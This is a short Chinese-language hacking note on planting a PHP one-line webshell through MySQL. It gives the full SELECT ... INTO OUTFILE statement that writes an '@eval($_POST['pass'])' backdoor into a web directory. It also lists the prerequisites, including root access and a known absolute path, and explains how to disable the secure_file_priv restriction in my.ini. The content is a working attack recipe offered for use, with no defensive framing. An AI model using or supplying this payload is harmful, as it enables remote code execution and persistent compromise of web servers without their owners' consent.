利用mysql写入一句话木马
前提:
root权限,知道了服务器的web的绝对路径
select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\WWW\22.php"
如果执行成功,生成D:WWW22.php,并写入
<?php @eval($_POST['pass']);?>
如果出现:
提示错误[Error Code] 1290 - The MySQL server is running with the --secure-file-priv option解决办法
是mysql设置的权限的问题
mysql对通过文件导入导出作了限制,默认不允许
show variables like '%secure%';
修改my.ini
secure_auth = ON
secure_file_priv = ""
注意:
1、绝对路径的猜解
2、INTO OUTFILE 后面的"D:\WWW\22.php"(对反斜杠做了一次转义)